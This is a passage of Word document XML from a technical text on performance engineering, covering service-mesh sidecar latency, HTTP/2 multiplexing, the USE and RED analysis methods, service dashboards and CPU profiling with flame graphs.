        <w:t>Each service-to-service call in a service mesh traverses two sidecar proxies (caller's Envoy and callee's Envoy). The added latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6806A788" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255EDA9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Without service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B63C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Service A → network → Service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7ECA84" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency: network propagation + processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2BF6E7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="57ABEAA9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>With service mesh (Envoy sidecars):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79564110" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Service A → localhost:15001 (Envoy) → network → Envoy:15006 → Service B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B03B0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Additional hops: 2 TCP connections to Envoy processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9960F6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Additional latency: ~0.1-0.5ms per hop × 2 = 0.2-1ms added latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5929981B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2BBD1C60" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For a service with 1ms baseline service time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F65D2E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1ms → 2ms with sidecar: 100% latency increase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56615A11" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC92C65" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For a service with 100ms baseline service time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8FFF4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  100ms → 101ms with sidecar: 1% latency increase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FDE6D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC multiplexing throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44CA93" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>gRPC uses HTTP/2 multiplexing — multiple RPCs share one TCP connection. At high throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C2E1D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221D7AA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Without multiplexing (one TCP connection per RPC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B7962" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1000 concurrent RPCs = 1000 TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CA2A2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Each connection: 20-80KB kernel memory for TCP state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607E869" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1000 connections = 20-80MB kernel memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486BC987" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  TCP slow start on each new connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F2186" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4755F795" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>With HTTP/2 multiplexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807EA2B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1000 concurrent RPCs over ~10 TCP connections (configurable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF41B2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  10 × 20-80KB = 200-800KB kernel memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48782DD8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Persistent connections — no slow start overhead after initial ramp-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45838BC3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62959EF0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput improvement: fewer connections → more efficient bandwidth utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF5AFF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency improvement: no handshake overhead for established connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F529B23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="2872754C">
          <v:rect id="_x0000_i5203" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1677E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Performance Analysis Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C022824" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The USE Method (Utilization, Saturation, Errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CABD67" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Brendan Gregg's </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USE Method</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> provides a systematic approach to performance analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D0E778" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For every resource (CPU, memory, network, disk, locks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364CB246" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375FEC71" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Utilization: How busy is this resource? (0–100%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE69B0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  High utilization: resource is a potential bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C297F72" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Measurement: top, iostat, netstat, perf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B11A8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="06B11A53" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Saturation: How much work is queued waiting for this resource?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534B8FC8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  High saturation: resource is a confirmed bottleneck (queue is forming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7DD40" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Measurement: vmstat (run queue), iostat (await vs svctm), netstat (send/receive buffers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FA1D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="61FF7FED" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Errors: Are there errors occurring on this resource?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DB9F5C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Errors indicate failures beyond performance issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D545B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Measurement: dmesg, /proc/net/dev (errors/dropped), hardware error counters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019E8EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The diagnostic power of USE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D09729D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7EBDEA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>CPU: Utilization=90%, Saturation=high (long run queue), Errors=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F487B6B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>→ CPU is the bottleneck. Add CPU cores or optimize CPU-intensive code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3A7AA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4933FEE5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Disk: Utilization=30%, Saturation=high (long I/O queue), Errors=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC684BC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>→ Disk queue is forming despite low utilization. Likely: random I/O pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF0F90" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  (many small random reads each taking 5ms, sequential utilization looks low)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7464FD79" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>→ Add SSDs, increase I/O parallelism, add read caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CF5F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="46547A2A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network: Utilization=95%, Saturation=high (TCP buffers full), Errors=high (drops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DF8602" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>→ Network link is saturated. Increase bandwidth, add compression, add CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6724D204" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The RED Method (Rate, Errors, Duration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99D4C0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Tom Wilkie's </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RED Method</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> for microservices and request-serving components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A836F70" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57038A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Rate:     Requests per second being processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F9588" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">Errors:   Number of failed requests per second  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488586D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Duration: Distribution of response times (latency percentiles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB51527" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>These three metrics, per service and per endpoint, provide complete visibility into service health:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F964EA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1467E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Rate dropping:   Upstream sending fewer requests (upstream issue) or requests being rejected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A0F4F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Errors rising:   Service is failing (code errors, dependency failures, resource exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA4B1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Duration rising: Service is degrading (resource contention, slow dependencies, GC pauses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFF299" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dashboard template for each service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFA9C5D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D9240" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Row 1: Rate (requests/sec) — broken by status code (2xx, 4xx, 5xx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F05B65" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Row 2: Error rate (%) — (5xx / total) over time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF09BC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Row 3: Latency p50, p95, p99, p999 — separate lines, different colors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655352F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Row 4: Upstream latency — per downstream dependency (how slow are my dependencies?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE61547" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Row 5: Resource utilization — CPU%, memory%, connection pool usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB3063" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Profiling Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C3FE0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU profiling — sampling vs instrumentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB3C28" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sampling profiler (perf, py-spy, async-profiler):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Periodically interrupts the program (100–1000 times/second) and records the current call stack. Statistical approximation — functions that appear in many samples consume more CPU. Overhead: &lt;5%. No code modification required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FA4D2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Instrumentation profiler (JProfiler, YourKit):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Inserts timing code at function entry/exit. Exact measurements. Overhead: 10–50%. Can change program behavior (probe effect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2E169" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For production profiling:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Always use sampling profilers. Instrumentation profilers change the behavior being measured too significantly for production use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE39CF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The flame graph interpretation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC8AAB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F90C579" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Flame graph (CPU profile):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF47678" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  X axis: alphabetical ordering within same depth (NOT time order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2071A653" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Y axis: call stack depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430671A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Width: proportion of CPU samples containing this function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941FF28" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6A149" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Wide bars at the top → functions consuming most CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C63BBE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → If user-space code: computation bottleneck, optimize the algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEEDA25" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → If kernel code (marked with [k]): syscall overhead, I/O bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233630E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
